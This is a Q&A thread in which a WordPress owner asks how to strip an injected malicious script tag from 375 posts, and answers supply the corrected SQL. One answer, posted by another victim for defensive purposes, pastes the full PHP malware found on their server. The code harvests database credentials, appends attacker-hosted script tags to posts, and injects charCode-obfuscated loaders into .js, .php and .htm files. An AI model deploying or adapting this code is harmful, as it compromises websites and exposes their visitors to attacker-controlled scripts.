# How to mass delete one line from all posts after site hack

Tags: query, hacked, bulk

My Wordpress site has been hacked and every post has had

`<script src='https://crow.lowerthenskyactive.ga/m.js?n=ns1' type='text/javascript'></script>`

added to the end of each post which I need to remove. I have 375 posts I need this removing from I have tried

`UPDATE wp_posts SET post_content = REPLACE (post_content, '<p style="text-align: center;"><img src="http://i.imgur.com/picture.jpg" alt="" /></p>', '');`

from the [How to mass delete one line from all posts](https://wordpress.stackexchange.com/questions/188384/how-to-mass-delete-one-line-from-all-posts)

and substituted it with the following query I'm thinking it has something to do with the ' in the query

`UPDATE wp_posts SET post_content = REPLACE (post_content, '<script src='https://crow.lowerthenskyactive.ga/m.js?n=ns1' type='text/javascript'></script>', '');`

but I get the following error

`#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'https://crow.lowerthenskyactive.ga/m.js?n=ns1' type='text/javascript'></script>'' at line 1`

when I run the query I think it has something to do with the `'` inside the script tags but I don't know how to remove them.

Comment: I am not sure in your way. If I need fast way to remove a virus string, I import backup of DB as SQL and remove the string as txt. After that I would update the DB. - This is not awesome way but workable. I think in your case it would be faster

Comment: If you need to have a `'` character inside a SQL string delimited with single quotes, escape it with a backslash: `\'`.

Comment: happened the same to me today, there should be a Wordpress plugin or something that have a security issue

Comment: The best and easiest way is to ask your host provider to restore your site to a date before hacked of there isnt much update
Otherwise you have to check directories where they uploaded some scripts cause if you delete all the codes manually you still get them back

Answer (score 5, accepted):

Try this:

```
UPDATE wp_posts SET post_content = REPLACE (post_content, "<script src='https://crow.lowerthenskyactive.ga/m.js?n=ns1' type='text/javascript'></script>","");
```

Comment: That worked like a charm Thankyou

Answer (score 0):

Your original code had single quotes inside a single quote. Which is why @uprompt 's code worked. .... he uses a double quote to surround the text to search for in the command.

Answer (score 0):

I was hacked with the same script, just the URL is different.

```
<script src="https://drake.strongcapitalads.ga/m.js?n=ns1" type="text/javascript2></script>
```

Seems this group has various server under their control. I already sent out abuse emails.

Don't forget that the malware was also added to all your *.js files and other files. Here is the malicious script that was uploaded to my server making those chances to the posts and other files:

```
<?php echo "ssqqss>>>";
error_reporting(0);
ini_set('display_errors',0);
ini_set('max_execution_time', '300');
ini_set('memory_limit', '-1');
$count = 0;

search_file_js($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../",".js");
echo "\r\n
jssss count:: ". $count;
echo "<<<<ssqqss";

  
function get_var_reg($pat,$text) {
    
    if ($c = preg_match_all ("/".$pat."/is", $text, $matches))
    {
        return $matches[1][0];
    }
        
    return "";
}
function search_file_ms($dir,$file_to_search){

$search_array = array();

$files = scandir($dir);

if($files == false) {
    
    $dir = substr($dir, 0, -3);
    if (strpos($dir, '../') !== false) {
        
        @search_file_ms( $dir,$file_to_search);
        return;
    }
    if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
        
        @search_file_ms( $dir,$file_to_search);
        return;
    }
}

foreach($files as $key => $value){


    $path = realpath($dir.DIRECTORY_SEPARATOR.$value);

    if(!is_dir($path)) {
        if (strpos($value,$file_to_search) !== false) {
        
            show_sitenames($path);
            
            
            
        }

    } else if($value != "." && $value != "..") {

        @search_file_ms($path, $file_to_search);

    }  
 } 
}
function show_sitenames($file){
    $content = @file_get_contents($file);
    if(strpos($content, "DB_NAME") !== false) {
    
    
    $db = get_var_reg("'DB_NAME'.*?,.*?['|\"](.*?)['|\"]",$content);
    $host = get_var_reg("'DB_HOST'.*?,.*?['|\"](.*?)['|\"]",$content);
    $user = get_var_reg("'DB_USER'.*?,.*?['|\"](.*?)['|\"]",$content);
    $pass = get_var_reg("'DB_PASSWORD'.*?,.*?['|\"](.*?)['|\"]",$content);


// Create connection
$conn = new mysqli($host, $user, $pass);

// Check connection
if ($conn->connect_error) {
 
} else { 


$q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%post%'";
$result = $conn->query($q);
if ($result->num_rows > 0) {
    while($row = $result->fetch_assoc()) {
        $q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]."  LIMIT 1 ";
    $result2 = $conn->query($q2);
    if ($result2->num_rows > 0) {
        while($row2 = $result2->fetch_assoc()) {
            $val = $row2['post_content'];
            if(strpos($val, "drake.strongcapitalads.ga") === false){
                if(strpos($val, "drake.strongcapitalads.ga") === false){
                    
                
                    $q3 = "UPDATE " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." set post_content = CONCAT(post_content,\"<script src='https://drake.strongcapitalads.ga/m.js?n=ns1' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%drake.strongcapitalads.ga%'";
                    $conn->query($q3);
                    echo "sql:" . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"];
                
                } else {
                
                }

            } 
        }
    } else {
    }
    }
} else {
}
$conn->close();
}
}
}

function search_file($dir,$file_to_search){

$files = @scandir($dir);

if($files == false) {
    
    $dir = substr($dir, 0, -3);
    if (strpos($dir, '../') !== false) {
        
        @search_file( $dir,$file_to_search);
        return;
    }
    if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
        
        @search_file( $dir,$file_to_search);
        return;
    }
}

foreach($files as $key => $value){

    $path = realpath($dir.DIRECTORY_SEPARATOR.$value);
    
    if(!is_dir($path)) {
        if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) {

        make_it($path);

    } }else if($value != "." && $value != "..") {

        search_file($path, $file_to_search);

    }  
 } 

}

function search_file_index($dir,$file_to_search){

$files = @scandir($dir);

if($files == false) {
    
    $dir = substr($dir, 0, -3);
    if (strpos($dir, '../') !== false) {
        
        search_file_index( $dir,$file_to_search);
        return;
    }
    if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
        
        search_file_index( $dir,$file_to_search);
        return;
    }
}

foreach($files as $key => $value){

    $path = realpath($dir.DIRECTORY_SEPARATOR.$value);
    
    if(!is_dir($path)) {
        if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) {

        make_it_index($path);

    } }else if($value != "." && $value != "..") {

        search_file_index($path, $file_to_search);

    }  
 } 

}
function search_file_js($dir,$file_to_search){

$files = @scandir($dir);
if($files == false) {
    
    $dir = substr($dir, 0, -3);
    if (strpos($dir, '../') !== false) {
        
        @search_file_js( $dir,$file_to_search);
        return;
    }
    if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
        
        @search_file_js( $dir,$file_to_search);
        return;
    }
} else {

foreach($files as $key => $value){

    $path = realpath($dir.DIRECTORY_SEPARATOR.$value);
    
    if(!is_dir($path)) {
        if (strpos($value,$file_to_search) !== false && (strpos($value,".js") !== false)) {
global $count;
$count++;
        make_it_js($path);

    } }else if($value != "." && $value != "..") {

        search_file_js($path, $file_to_search);

    }  
 } 
 }

}

function make_it_js($f){
            $g = file_get_contents($f);
            
                                        

if (strpos($g, '100,114,97,107,101,46,115,116,114,111,110,103,99,97,112,105,116,97,108,97,100,115,46,103,97') !== false) {

} else {

$l2 = "Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,114,97,107,101,46,115,116,114,111,110,103,99,97,112,105,116,97,108,97,100,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();";
$g = file_get_contents($f);
$g = $l2.$g;
@system('chmod 777 '.$f);
@file_put_contents($f,$g);

}

            
}
function make_it_index($f){
$g = file_get_contents($f);
if (strpos($g, '100,114,97,107,101,46,115,116,114,111,110,103,99,97,112,105,116,97,108,97,100,115,46,103,97') !== false || strpos($g, 'drake.strongcapitalads.ga') !== false) {

} else {
$l2 = "<script type='text/javascript' src='https://drake.strongcapitalads.ga/m.js?n=nb5'></script>";
$g = file_get_contents($f);
$g = $l2.$g;

@system('chmod 777 '.$f);
@file_put_contents($f,$g);
echo "in:".$f."\r\n";


            }
}

function make_it($f){
$g = file_get_contents($f);
if (strpos($g, '100,114,97,107,101,46,115,116,114,111,110,103,99,97,112,105,116,97,108,97,100,115,46,103,97') !== false) {

} else {
$l2 = "<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,114,97,107,101,46,115,116,114,111,110,103,99,97,112,105,116,97,108,97,100,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>";
if (strpos($g, '<head>') !== false) {
$b = str_replace("<head>","<head>".$l2,$g);
@system('chmod 777 '.$f);
@file_put_contents($f,$b);
echo "hh:".$f."\r\n";
}
if (strpos($g, '</head>') !== false) {
$b = str_replace("</head>",$l2."</head>",$g);
@system('chmod 777 '.$f);
@file_put_contents($f,$b);
echo "hh:".$f."\r\n";
}


            }
}
```